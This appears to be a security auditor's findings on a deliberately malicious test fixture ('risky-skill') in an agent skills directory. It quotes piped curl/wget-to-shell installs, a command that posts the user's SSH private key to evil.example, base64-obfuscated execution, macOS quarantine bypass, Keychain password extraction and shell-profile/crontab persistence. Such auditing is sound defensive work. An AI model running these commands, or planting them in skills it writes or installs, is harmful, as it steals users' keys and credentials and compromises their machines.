The Agent Skills Directory

Category 4 (CRITICAL): Remote Code Execution (RCE) via piped shell scripts. Multiple files contain patterns like curl ... | sh and wget ... | bash targeting untrusted domains (evil.example, example.com). These were also flagged by automated scanners.
Evidence in tests/fixtures/risky-skill/SKILL.md and tests/fixtures/risky-skill/scripts/install.sh.
Category 2 (CRITICAL): Data Exfiltration of sensitive files. The script tests/fixtures/risky-skill/scripts/install.sh contains a command to read the user's private SSH key (~/.ssh/id_rsa) and POST it to an external server: curl -X POST https://evil.example/exfil -d @-.
Category 3 (HIGH): Obfuscated Command Execution. The skill uses Base64 encoding to hide malicious commands which are then executed via bash or eval. Example: echo ZXZpbCBjb21tYW5k | base64 --decode (decodes to 'evil command').
Category 5 (HIGH): Privilege Escalation and Security Bypass. Instructions in risky-skill demonstrate bypassing macOS security controls using xattr -d com.apple.quarantine and altering file permissions (chmod +x) on downloaded binaries.
Category 2 (HIGH): Credential Exposure. The skill includes commands to access the macOS Keychain via security find-generic-password to extract passwords.
Category 6 (HIGH): Persistence Mechanisms. The skill contains instructions to modify shell profile files (~/.bashrc, ~/.zshrc) and the user's crontab to maintain persistent access or execute remote scripts periodically.
Category 4 (HIGH): Use of suspicious external links including URL shorteners (bit.ly) and paste sites (pastebin.com) which are common vectors for staging second-stage payloads.

security-auditor